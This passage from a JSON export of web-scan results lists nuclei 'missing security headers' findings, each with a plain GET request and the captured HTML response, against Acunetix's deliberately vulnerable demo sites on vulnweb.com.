13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 337, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:40:51.917Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 338, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:40:52.046Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 339, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:40:52.180Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 340, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:40:52.306Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 341, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:40:52.433Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 342, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:40:52.579Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 343, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:52.709Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 344, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:52.840Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 345, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:40:52.975Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: 